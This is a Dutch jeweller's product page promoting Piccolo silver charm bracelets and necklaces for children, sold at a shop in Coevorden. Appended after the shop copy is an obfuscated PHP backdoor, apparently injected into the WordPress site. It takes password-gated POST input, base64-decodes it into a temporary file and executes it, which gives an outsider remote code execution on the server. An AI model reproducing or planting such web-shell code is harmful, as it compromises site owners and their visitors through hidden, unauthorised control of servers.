Piccolo-kindsieraden,-kinderbedels,-armbandje-kind-kopen-bij-Wolters-Juweliers-Coevorden-Emmen

Piccolo bedels en armbanden voor kinderen bij Wolters Juweliers Coevorden

Piccolo het favoriete sieradenmerk van stoere dametjes en heertjes. Het systeem lijkt op de bedels van Pandora maar dan speciaal in het klein voor kinderen. Het leuke aan dit merk is dat je je eigen armband en ketting bij elkaar kunt sparen, door telkens opnieuw een bedeltje toe te voegen. Alle bedels zijn van 925 zilver, daarnaast wordt er kleur aangebracht door emaille te gebruiken en te werken met gekleurde steentjes. Door de stevige sluiting en stoppertjes blijven de bedeltjes perfect op hun plaats.

De armbandjes zijn er in verschillende lengtes, als de oude armband te klein is dan kan er een langere worden gekocht waar natuurlijk weer alle Piccolo bedels opgedraaid kunnen worden. De bedels en armbandjes zijn ook een fijn cadeau voor je verjaardag en andere belangrijke gebeurtenissen zoals bij het behalen van je zwemdiploma.

Bij Wolters Juweliers vindt u een ruime collectie Piccolo bedels en armbanden speciaal voor kinderen. De armbandjes zijn er vanaf 12 cm, wat het dan dus ook erg leuk maakt om het als kraamcadeautje te geven. Bekijk ook onze andere sieraden voor kinderen en cadeautje voor baby's op onze speciale pagina met sieraden voor kinderen.

Piccolo bedels en armbandjes voor kinderen kopen bij Wolters Juweliers

Het perfecte kindsieraad cadeau

Vanwege de hippe uitstraling is dit merk het perfecte cadeau voor een verjaardag of andere speciale gelegenheid zoals een Communie!

Piccolo armband, bedels, ketting voor kinderen Wolters Juweliers Coevorden Emmen

Piccolo armbanden ook voor jongens!

Stoere jongens houden ook van Piccolo! Jouw eigen armband samenstellen met een voetbalschoen, een motorbedel, een game console of een andere stoere bedel? Waar wacht je nog op! Kom langs bij Wolters Juweliers Coevorden Emmen om de leukste bedels uit te zoeken!

Ook erg leuk om cadeau te doen aan de jarige of als cadeautje bij het behalen van een zwemdiploma. Weet u niet precies wat hij leuk vind, dan kunt u ook de onze juwelierscheque cadeau doen, dan kan de jarige zelf zijn favoriete bedels komen uitzoeken.

Piccolo-armband-jongens-bedels-kopen-bij-Wolters-Juweliers-Coevorden-Hoogeveen

Over Picollo

Al meer dan 12,5 jaar is Piccolo het favoriete sieradenmerk van stoere dametjes en heertjes. Het leuke aan Piccolo is dat je je eigen armband en ketting bij elkaar kunt sparen, door telkens opnieuw een bedeltje toe te voegen. Dat maakt het ook een super-geschikt cadeau voor je verjaardag en andere belangrijke gebeurtenissen.

Wat dacht je van de heerlijk gekleurde bedels in de vorm van taartjes, ijsjes en fruit? Afgewisseld met diertjes, hartjes, een stoere voetbal en hangertjes, is er voor ieder kind iets moois samen te stellen. Bij Wolters Juweliers Coevorden Emmen hebben wij vele bedels in huis die u met alle gemak even kunt bekijken.

Piccolo armband, bedels, ketting voor kinderen Wolters Juweliers Coevorden Emmen
Piccolo beads, bedels kopen bij Wolters Juweliers Coevorden Emmen
Piccolo sieraden voor kids kopen Bij Wolters Juweliers Coevorden Emmen
nieuwe collectie piccolo kinderbedels en armbandjes Wolters Juweliers Coevorden Emmen
Ruime keuze bedels Piccolo Wolters Juweliers Coevorden Emmen
Bedels, armbanden, kettingen voor kids Piccolo Wolters Juweliers Coevorden Emmen

Officieel dealer

Wolters Juweliers Coevorden Emmen is officieel dealer van Piccolo kindersieraden, armbandjes en bedels. In Coevorden ligt een uitgebreide collectie. Vandaar dat we veel klanten hebben uit Gramsbergen, Emmen, Klazinaveen, Hardenberg en Hoogeveen en vele dorpen eromheen zoals Lutten, Sleen, Dalen en Schoonebeek. U bent van harte welkom in onze winkel in Coevorden om de sieraden uit te zoeken en te bekijken.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}